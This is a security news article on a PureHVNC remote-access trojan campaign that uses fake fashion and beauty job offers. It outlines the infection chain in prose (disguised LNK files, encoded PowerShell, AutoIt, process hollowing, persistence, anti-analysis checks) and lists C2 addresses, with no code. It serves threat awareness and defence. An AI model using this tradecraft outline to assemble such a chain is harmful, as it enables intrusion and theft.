PureHVNC RAT Uses Fake Job Offers and PowerShell to Evade Security Defenses
A new and highly evasive malware campaign delivering the PureHVNC Remote Access Trojan (RAT) has been identified by Netskope Threat Labs, showcasing a complex multi-layer infection chain designed to bypass modern security defenses.
This campaign, active in 2024, leverages fake job offers from well-known global brands like Bershka, Fragrance Du Bois, John Hardy, and Dear Klairs to lure victims, targeting individuals seeking high-profile marketing roles in the beauty and fashion industries.
Sophisticated Multi-Layer Infection Chain
The use of such tailored social engineering tactics, combined with advanced technical evasion methods, underscores the sophistication of this threat, which grants attackers full system access to deploy additional malware and tools.
The infection begins with the download of a malicious LNK file disguised as a legitimate document, often bearing dual extensions like “.pdf.lnk” to mislead users into believing it is a harmless PDF.
Upon execution, the LNK file triggers a PowerShell command that decodes a base64-encoded script, initiating a multi-stage process involving PowerShell, JavaScript, AutoIt scripts, and obfuscated payloads.
This chain includes downloading a large fake MP4 file laced with malicious JavaScript hidden within HTML tags, which further decodes and executes additional scripts to retrieve and run a portable executable (PE) file named “phom.exe.”
Technical Evasion Tactics
A decoy PDF resembling a job offer is simultaneously displayed to maintain the ruse, while behind the scenes, an AutoIt-compiled binary deploys further scripts, creates persistence via an internet shortcut in the Windows Startup folder, and uses process hollowing to inject a .NET payload into legitimate processes like jsc.exe or AppLaunch.exe.
This payload, encrypted with AES-256 in CBC mode and obfuscated with .NET Reactor, ultimately loads the PureHVNC RAT, with configurations revealing multiple campaign IDs and associated command-and-control (C2) servers such as 85.192.48.3 and 139.99.188.124.
The campaign employs extensive obfuscation at every stage, using tools like CypherIT crypter for AutoIt scripts and embedding junk data to evade detection.
Anti-analysis checks are also in place, terminating execution if common antivirus emulator names or processes like AvastUI.exe are detected.
Persistence is achieved through files dropped in a “WordGenius Technologies” folder in %LocalAppData%, with dynamic naming conventions to further avoid detection.
The technical intricacy of this attack, from string replacement in scripts to leveraging native Windows tools like mshta.exe for remote file execution, highlights its intent to sidestep traditional security measures.
Netskope Threat Labs notes that while the exact initial vector remains unclear, email delivery is strongly suspected based on malware configurations and lures like copyright infringement notices alongside job offers.
As PureHVNC continues to evolve with new delivery methods, including Python chains and genAI site lures observed in 2024, ongoing vigilance and advanced threat detection are critical to counter its sophisticated tactics, which pose a significant risk to individuals and organizations alike by enabling unauthorized access and potential further exploitation.